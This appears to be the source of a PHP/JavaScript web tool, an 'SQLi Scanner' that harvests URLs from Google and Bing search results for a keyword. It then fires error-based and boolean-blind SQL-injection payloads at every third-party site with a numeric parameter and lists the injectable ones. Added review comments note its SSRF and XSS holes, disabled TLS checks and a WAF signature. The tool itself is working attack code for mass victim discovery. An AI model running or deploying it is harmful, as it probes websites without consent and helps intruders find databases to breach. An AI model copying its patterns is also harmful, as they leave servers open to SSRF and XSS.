<?php
2
/*  Google dork scanner
3
*	yepss... you know what this is
4
*
5
*/
// Silence every PHP diagnostic for the whole request. With this in place a
// failed HTTP fetch, a cURL error or a regex failure produces no visible
// output at all, so a caller cannot tell "no result" from "broken".
@error_reporting(0);
// Allow up to 60 s per request: the probes below issue several outbound HTTP
// requests (each with a 7 s cURL timeout, see fetch()) per page of results.
@set_time_limit(60);
/**
 * Perform one outbound HTTP GET and return the response body.
 *
 * NOTE(review): $url is used verbatim as the request target. The request
 * handlers at the bottom of this file feed values taken straight from $_GET
 * into the two callers of this function (which only force the scheme to
 * http://), so a deployed copy of this script lets any visitor make this
 * server issue HTTP requests to hosts of the visitor's choosing, internal
 * ones included.
 *
 * @param string $url absolute URL to request
 * @return string|false response body; false on a cURL failure, but "" on a
 *                      failed file_get_contents() fallback — the two code
 *                      paths do not agree on their failure value
 */
function fetch($url) {
	// Fallback when the cURL extension is absent: plain stream fetch with
	// warnings suppressed, surrounding whitespace trimmed.
	if(!function_exists("curl_init")){
		$bu = trim(@file_get_contents($url));
		if($bu == "") return "";
		else return $bu;
	}

	// Fixed request headers sent with every probe. Together they form a
	// stable fingerprint of this tool: a Firefox 3.6 / Windows NT 6.0
	// User-Agent declaring a "de" locale while Accept-Language says "en",
	// plus both no-cache headers on a plain GET. A defender can key a
	// WAF/IDS rule on that combination.
	$header[] = "Accept-Language: en";
	$header[] = "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3";
	$header[] = "Connection: Keep-Alive";
	$header[] = "Pragma: no-cache";
	$header[] = "Cache-Control: no-cache";

	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, $url);
	curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); // return the body instead of printing it
	// Certificate and hostname verification are both switched off, so any
	// https:// endpoint (or an on-path interceptor) is accepted unchecked.
	curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE );
	curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
	curl_setopt($ch, CURLOPT_TIMEOUT, 7); // whole transfer must complete within 7 s
	curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
	$content = curl_exec($ch); // false on timeout/connection error; not checked here
	curl_close($ch);
	return $content;
}
/**
 * "Quick scan": error-based SQL-injection probe against one URL.
 *
 * For every query-string parameter whose value is numeric, one request is
 * sent with a URL-encoded single quote (%27) appended to that parameter and
 * the response body is searched for well-known database error strings.
 *
 * What this means for a site owner: the probe only reports a hit when the
 * application echoes a raw database error into the page. Parameterised
 * queries make the appended quote harmless, and generic error pages (no DB
 * message leaked to the client) make this check return nothing even where
 * a flaw exists. In access logs it appears as a numeric parameter followed
 * by %27, sent with the User-Agent fixed in fetch().
 *
 * @param string $url_ target URL, with or without a leading http://
 * @return string name of the first parameter that produced a DB error
 *                message, or "" if none did / the URL has no query string
 */
function sqlcheck($url_){
	// clean url: strip any existing "http://" and put exactly one back, so the
	// scheme is always http; turn HTML-escaped "&amp;" separators back into "&"
	$url_ = "http://".trim(str_ireplace("http://","",$url_));
	$url_ = str_ireplace("&amp;","&",$url_);
	$urls = explode("?",$url_);
	// check if url contains querystring (exactly one "?")
	if(count($urls)==2){
		$url = $urls[0]; // not used further; the full $url_ is what gets edited below
		$querys = explode("&",$urls[1]);
		foreach($querys as $query){
			$vars = explode("=",$query);
			//echo $query;
			// check if parameter has a numeric value
			if((count($vars)>=2) && (is_numeric($vars[1]))){
				// append an encoded single quote to this key=value pair only
				$final = str_replace($query,$query."%27",$url_);
				//echo $final;
				$content = fetch($final);
				// any of these substrings in the body counts as a hit; a page
				// that merely mentions "sql error" in its own text matches too
				if(preg_match("/sql syntax|sql error|right syntax to use near|syntax error converting|unclosed quotation|is not a valid MySQL result/i",$content)){
					return $vars[0]; // name of the first parameter that matched
				}
			}
		}
	}
	return ""; // nothing found
}
61
/**
 * "Depth scan": boolean-based (blind) SQL-injection probe against one URL.
 *
 * For each numeric query parameter two requests are sent: one whose injected
 * condition is always true (AND n=(SELECT n)--) and one whose condition is
 * always false (AND n=(SELECT 0)--), with n a fresh random four-digit number
 * each time. Both bodies are stripped of tags and compared by length; if the
 * "true" page is at least 30 characters longer, the parameter is reported.
 * If that pair shows no difference, the same pair is repeated in a string
 * context ('... AND '1'='1).
 *
 * Unlike sqlcheck() this needs no database error in the output, so hiding
 * error messages alone does not make a flaw invisible to it — only
 * parameterised queries do. From the target's side it shows up as pairs of
 * near-identical requests seconds apart in which a numeric parameter is
 * followed by %20AND%20<4 digits>%3D%28SELECT — an easy WAF signature.
 *
 * @param string $url_ target URL, with or without a leading http://
 * @return string name of the first parameter whose true/false responses
 *                differed by >= 30 characters, or "" if none did
 */
function sqlheavycheck($url_){
	// clean url: force a single http:// scheme and decode "&amp;" separators
	$url_ = "http://".trim(str_ireplace("http://","",$url_));
	$url_ = str_ireplace("&amp;","&",$url_);

	// check if url contains querystring (split at the first "?")
	$pos = stripos($url_,"?");
	if($pos !== false){
		$url = substr($url_,0,$pos); // not used further
		$que = substr($url_,$pos+1);


		$querys = explode("&",$que);
		foreach($querys as $query){
			$vars = explode("=",$query);
			//echo $query;
			// check if parameter has a numeric value
			if((count($vars)>=2) && (is_numeric($vars[1]))){
				// and 1=(select 1)  -- the always-true request
				$acak = rand(1111,9999);
				$final = str_replace($query,$query."%20AND%20".$acak."%3D%28SELECT%20".$acak."%29--",$url_);
				$contrue = fetch($final);
				//echo "final1 : ".$final."<br />";

				// and 1=(select 0)  -- the always-false request (new random n)
				$acak = rand(1111,9999);
				$final = str_replace($query,$query."%20AND%20".$acak."%3D%28SELECT%200%29--",$url_);
				//echo "final2 : ".$final."<br />";
				$confalse = fetch($final);

				// compare visible-text length only (tags stripped)
				$numtrue = strlen(strip_tags($contrue));
				$numfalse = strlen(strip_tags($confalse));
				$selisih = $numtrue - $numfalse; // difference; only a longer "true" page counts


				if($selisih >= 30){
					return $vars[0];
				}
				else{
					//' and 1=(select 1) and '1'='1  -- same test, string context
					$acak = rand(1111,9999);
					$final = str_replace($query,$query."%27%20AND%20".$acak."%3D%28SELECT%20".$acak."%29%20AND%20%271%27=%271",$url_);
					$contrue = fetch($final);
					//echo "final1 : ".$final."<br />";

					//' and 1=(select 0) and '1'='1
					$acak = rand(1111,9999);
					$final = str_replace($query,$query."%27%20AND%20".$acak."%3D%28SELECT%200%29%20AND%20%271%27=%271",$url_);
					//echo "final2 : ".$final."<br />";
					$confalse = fetch($final);

					$numtrue = strlen(strip_tags($contrue));
					$numfalse = strlen(strip_tags($confalse));
					$selisih = $numtrue - $numfalse;

					if($selisih >= 30){
						return $vars[0];
					}
				}
			}
		}
	}
	return ""; // nothing found
}
// debugging tools
128
// Two unauthenticated endpoints that run a single probe against a
// caller-supplied URL and print "<url> <parameter-or-empty>".
// NOTE(review): the value of $_GET['check'] / $_GET['heavycheck'] is
// (a) passed on to fetch() as a request target, so this server makes HTTP
// requests to whatever host a visitor names, and (b) echoed back into the
// response without htmlspecialchars(), which is a reflected-XSS sink.
// Anyone who finds this file on a web root should treat it as both.
if(isset($_GET['check'])&&($_GET['check']!="")){
$url = $_GET['check'];
echo $url." ".sqlcheck($url); // quick (error-based) probe
die();
}
if(isset($_GET['heavycheck'])&&($_GET['heavycheck']!="")){
$url = $_GET['heavycheck'];
echo $url." ".sqlheavycheck($url); // depth (boolean-based) probe
die();
}
138
// debugging tools end
// AJAX back end for the page below: fetch one page of search-engine results
// for the keyword in $_GET['dork'], and for every result URL that carries a
// numeric parameter run either the quick or the depth probe and print an
// HTML line per URL. The client keeps calling this with an increasing
// page= until the response starts with "_finish_|<message>".
// Inputs read: dork (required), setype (google|bing), page (int), heavy (1).
if(isset($_GET['dork'])&&($_GET['dork']!="")){
	$gnum = 10; // number of search results per page
	$setype = "google"; // default search engine: google
	if(isset($_GET['setype'])) $setype = strtolower(trim($_GET['setype']));
	
	// 1-based page number from the client, clamped to >= 1 ...
	if(isset($_GET['page'])){
		$gpage = (int) $_GET['page'];
		if($gpage < 1) $gpage = 1;
	}
	else $gpage = 1;
	// ... converted to the 0-based result offset the engines expect
	$gpage = ($gpage - 1) * $gnum;

	// $gpage is >= 0 here and $gnum is 10, so this condition can never hold;
	// the "max only" branch is dead code.
	if($gpage > ($gpage * $gnum)){
		echo "_finish_|max only ".$gpage." results";
		die();
	}
	
	$dork = stripslashes($_GET['dork']); // undo legacy magic_quotes escaping
	$dork = str_replace(" ","+",$dork);
	$dorki = urlencode($dork);
	
	if($setype == "google"){
		//g00gle nextbuttn---> <div class=med style=margin-top:2em>
		// Results come from a Google Custom Search Engine (fixed cx id);
		// each result is assumed to start with "<h2 class=r>".
		$gsearch = fetch("http://www.google.com/custom?num=".$gnum."&hl=en&cx=!009136828022434855111:b1vm8yfl888&q=".$dorki."&start=".$gpage."&sa=N");
		$raws = explode("<h2 class=r>",$gsearch);
		// empty response, no result markers, or the "last page" layout marker
		if((trim($gsearch) == "") || (count($raws) <= 1) || (preg_match("/div\sclass=med\sstyle=margin-top:2em/i",$gsearch))){
			echo "_finish_|no more search results from ".$setype;
			die();
		}
		
	}
	elseif($setype == "bing"){
		//bing nextbutton---> class="sb_pagN"
		// Drop everything up to the first ":" (a leading search operator);
		// note this uses the "+"-joined $dork, not the urlencoded $dorki.
		$dorki = preg_replace("/^[^:]*:(.*)/i","\\1",$dork);
		$gsearch = fetch("http://www.bing.com/search?q=".$dorki."&filt=all&first=".$gpage."&FORM=PERE3");
		$raws = explode("<div class=\"sb_tlst\"><h3>",$gsearch);			
		// finished when the response is empty, has no "next" control, or no results
		if((trim($gsearch) == "") || (!preg_match("/class=\"sb_pagN\"/i",$gsearch)) || (count($raws) <= 1)){
			echo "_finish_|no more search results from ".$setype;
			die();
		}
	}
	else{
		echo "_finish_|search engine not supported";
		die();
	}

	// Each chunk after a result marker is expected to begin with <a href="
	foreach($raws as $korban){
		if(strlen($korban) >= 9 && (substr($korban,0,9)=="<a href=\"")){
			$heavy = false;
			if((isset($_GET['heavy'])) && ($_GET['heavy']=='1')) $heavy = true;

			// the href value runs up to the next double quote
			$calon = substr($korban,9);
			$pos = strpos($calon,"\"");
			if($pos !== false){
				$url = trim(substr($calon,0,$pos));
				// skip a few large sites, and anything without a numeric parameter
				if(preg_match("/facebook\.|yahoo\.|google\.|youtube\./i",$url)) continue;
				if(!preg_match("/\w+=\d+/i",$url)) continue;
				
				// NOTE(review): $url comes from a third party's search listing and
				// is echoed into the anchor's href AND its visible text without
				// escaping. The extraction above guarantees it contains no double
				// quote, but any other markup in an indexed URL lands in this page
				// as-is (stored/reflected XSS via the search results).
				if($heavy) {
					$vulnvar = sqlheavycheck($url);
					if($vulnvar != "") $laporan = "<a href=\"".$url."\" target=\"_".rand(1111,9999)."\"><span class=\"white\">".$url."</span><span class=\"red\"> @ </span><span class=\"white\">".$vulnvar."</span></a><br />";
					else $laporan = "<a href=\"".$url."\" target=\"_".rand(1111,9999)."\">".$url."</a><br />";
					echo $laporan;
					
				}
				else{
					$vulnvar = sqlcheck($url);
					if($vulnvar != "") $laporan = "<a href=\"".$url."\" target=\"_".rand(1111,9999)."\"><span class=\"white\">".$url."</span><span class=\"red\"> @ </span><span class=\"white\">".$vulnvar."</span></a><br />";
					else $laporan = "<a href=\"".$url."\" target=\"_".rand(1111,9999)."\">".$url."</a><br />";
					echo $laporan;
				}
			}
		}
	}
	die(); // one page per request; the client asks for the next one
}
?><html>
221
<head><title>SQLi Scanner</title>
222
<link rel="shortcut icon" href="../favicon.ico">
223
<!-- <?php echo date("Y",time()); ?> Revan Aditya -->
224
<script type="text/javascript">
225
jalan = false;
226
nomer = 1;
227
nomermax = 100;
228
heavy = false;
229
230
// Issue one asynchronous GET to this same page ("?<vars>&page=<nom>") and
// pass the response text, together with the original vars, to cbFunction.
// Only a completed request with HTTP status 200 and a non-empty body
// reaches the callback; a timeout, a 5xx or an empty body is dropped
// silently, and since only the callback hides the spinner, the page then
// stays in its "loading" state.
function ajax(vars, nom, cbFunction){
	var req = window.XMLHttpRequest ? new XMLHttpRequest() : new ActiveXObject("MSXML2.XMLHTTP.3.0"); // legacy IE fallback
	var querystring = '?' + vars + '&page=' + nom;
	req.open("GET", querystring , true);
	req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); // no body is sent, so this has no effect
	req.onreadystatechange = function(){
		if (req.readyState == 4 && req.status == 200){
			if (req.responseText){
			  cbFunction(req.responseText,vars);
			}
		}
	}
	req.send(null);
}
244
// Callback for each server response. Appends the returned HTML to #result,
// then either requests the next page (while `jalan` is true and the text is
// not a "_finish_|<message>" line), shows "paused", or resets the form on
// finish. Finally scrolls the window to the bottom.
// `str` is server-generated HTML and is inserted via innerHTML unmodified,
// so whatever the PHP side echoes becomes live markup here.
function showResult(str, vars){
	var box = document.getElementById("result")
	// a PHP "Warning"/"Fatal" in the response is shown as a generic error line
	if(str.match(/Warning|Fatal/gi)) box.innerHTML += '<span class=\"red\">*** </span> error...<br />';
	else box.innerHTML += str;

	if(!jalan){
		// user hit Pause before this response arrived
		box.innerHTML += '<span class=\"red\">*** </span> paused...<br />';
		document.getElementById("loading").style.visibility = 'hidden';
		document.getElementById("btnOk").value = "Resume";
	}
	else {
		if(!str.match(/.*finish.*/gi)){
			sqlCheck(vars); // same query, next page (sqlCheck bumps `nomer`)
		}
		else{
			// everything after the "|" is the server's finish message
			var pesan = str.substring(str.indexOf("|") + 1);
			// note: assignment, not "+=", so the accumulated results are replaced
			box.innerHTML = '<span class=\"red\">*** </span> finish ( ' + pesan + ' )<br />';
			document.getElementById('setype').disabled = false;
			document.getElementById('dork').readOnly = false;
			document.getElementById("loading").style.visibility = 'hidden';
			document.getElementById("btnOk").value = "Search";
			nomer = 1;
			jalan = false;
		}
	}

	// scroll down 50px at a time until the position stops changing
	var oldYPos = 0, newYPos = 0;
	do{
		if (document.all){
			oldYPos = document.body.scrollTop;
		}
		else{
			oldYPos = window.pageYOffset;
		}
		window.scrollBy(0, 50);
		if (document.all){
			newYPos = document.body.scrollTop;
		}
		else{
			newYPos = window.pageYOffset;
		}
	} while (oldYPos < newYPos);
}
287
// Document-wide keypress handler (installed by initpg): Enter triggers the
// same action as the Search/Pause button. `keycode` is assigned without
// `var`, so it becomes an implicit global.
function keyHandler(ev){
	if (!ev){
		ev = window.event; // legacy IE event model
	}
	if (ev.which){
		keycode = ev.which;
	}
	else if (ev.keyCode){
		keycode = ev.keyCode;
	}
	if (keycode == 13){
		sikat();
	}
}
301
// Strip leading and trailing whitespace. This overwrites the browser's own
// String.prototype.trim for every string on the page, not just a polyfill
// when it is missing.
String.prototype.trim = function() {
	return this.replace(/^\s*|\s*$/g, "");
}
304
// Request the current page (`nomer`) of results for query string `xdata`
// and advance the page counter; does nothing while the scan is not running.
function sqlCheck(xdata){
	if(jalan){
		ajax(xdata, nomer, showResult);
		nomer++;
	}
}
310
// Same as sqlCheck but appends "&heavy=1", which selects the server-side
// depth probe instead of the quick one.
function sqlHeavyCheck(xdata){
	if(jalan){
		ajax(xdata + '&heavy=1', nomer, showResult);
		nomer++;
	}
}
316
// Click handler for the main button. Its label doubles as the state:
// "Search" starts from page 1, "Resume" continues from the current page,
// anything else (i.e. "Pause") stops the loop via berhenti().
function sikat(){
	var btext = document.getElementById("btnOk");
	if((btext.value == 'Search') || (btext.value == 'Resume')){
		if(!jalan){
			if(btext.value == 'Search') nomer = 1;
			var target = document.getElementById('dork');
			var setype = document.getElementById('setype');
			if(target.value.trim().length>0) {
				// lock the inputs while the scan runs
				document.getElementById("loading").style.visibility = 'visible';
				document.getElementById("btnOk").value = "Pause";
				target.readOnly = true;
				setype.disabled = true;
				jalan = true;
				sqlCheck('dork=' + encodeURIComponent(target.value) + '&setype=' + encodeURIComponent(setype.value));
			}
		}
		else alert("Please stop first...");
	}
	else {
		berhenti();
	}
}
338
// body.onload: route every keypress on the document through keyHandler.
function initpg(){
	document.onkeypress = keyHandler;
}
341
// Stop the scan: the in-flight request still completes, and showResult
// then prints "paused" because `jalan` is false.
function berhenti(){
	jalan = false;
}
344
// "Restart" button: after confirmation, reload index.php, which discards
// all results shown so far.
function bersih(){
	var tanya = confirm("Clear results and restart?");
	if(tanya == true) location.href = 'index.php';
}
348
// Handler for the text link next to the checkbox: toggle the checkbox
// by hand, then run the same logic as a direct click on it.
function checkheavy_fix(){
	var heavyval = document.getElementById("heavy");
	if(heavyval.checked) heavyval.checked = false;
	else heavyval.checked = true;
	checkheavy();
}
354
// Mirror the "Depth scan" checkbox into the global `heavy` flag and append
// a status line to the result box.
function checkheavy(){
	var heavyval = document.getElementById("heavy").checked;
	var box = document.getElementById("result")
	if(heavyval) {
		heavy = true;
		box.innerHTML += '<span class=\"red\">*** </span> depth scan...<br />';
	}
	else {
		heavy = false;
		box.innerHTML += '<span class=\"red\">*** </span> quick scan...<br />';
	}
}
366
367
</script>
368
<style type="text/css">
369
*{
370
	background:url('../images/bg.gif') #111;
371
	font-family: Lucida Console,Tahoma;
372
	color:#bbb;
373
	font-size:11px;
374
	text-align:left;
375
}
376
input,select,textarea{
377
	border:0;
378
	border:1px solid #900;
379
	color:#fff;
380
	background:#000;
381
	margin:0;
382
	padding:2px 4px;
383
}
384
input:hover,textarea:hover,select:hover{
385
	background:#200;
386
	border:1px solid #f00;
387
}
388
option{
389
	background:#000;
390
}
391
.red{
392
	color:#f00;
393
}
394
.white{
395
	color:#fff;
396
}
397
a{
398
	text-decoration:none;
399
}
400
a:hover{
401
	border-bottom:1px solid #900;
402
	border-top:1px solid #900;
403
}
404
#status{
405
	width:100%;
406
	height:auto;
407
	padding:4px 0;
408
	border-bottom:1px solid #300;
409
}
410
#result a{
411
	color:#777;
412
}
413
.sign{
414
	color:#222;
415
}
416
#box{
417
	margin:10px 0 0 0;
418
}
419
</style>
420
</head>
421
<body onload="initpg();">
422
423
424
425
<div id="result"></div>
426
<div id="box">
427
<input type="text" name="dork" id="dork" value="" style="width:400px;" title="Give a keyword to search..." />
428
<select name="setype" id="setype">
429
	<option value="google">Google</option>
430
	<option value="bing">Bing</option>
431
</select>
432
<input type="submit" id="btnOk" name="btnOk" value="Search" onclick="sikat();" style="width:70px;text-align:center;" />
433
<input type="submit" name="btnClear" value="Restart" onclick="bersih();" style="width:70px;text-align:center;" />
434
<span class="sign">revres</span><span class="red">.</span><span class="sign">tanur</span>
435
<img src="../images/loading.gif" alt="" style="margin:0;padding:0;vertical-align:middle;visibility:hidden;" id="loading" title="loading..." />
436
<p><input onclick="checkheavy();" style="vertical-align:middle;margin:0 8px;padding:0;border:0;" type="checkbox" name="heavy" id="heavy" /><a style="vertical-align:middle;" href="javascript:checkheavy_fix();">Depth scan ( slow but sure )</a></p>
437
</div>
438
439
440
<!-- aku suka kamu suka sudah jangan bilang syapaa syapaaa... -->
441
</body>
442
</html>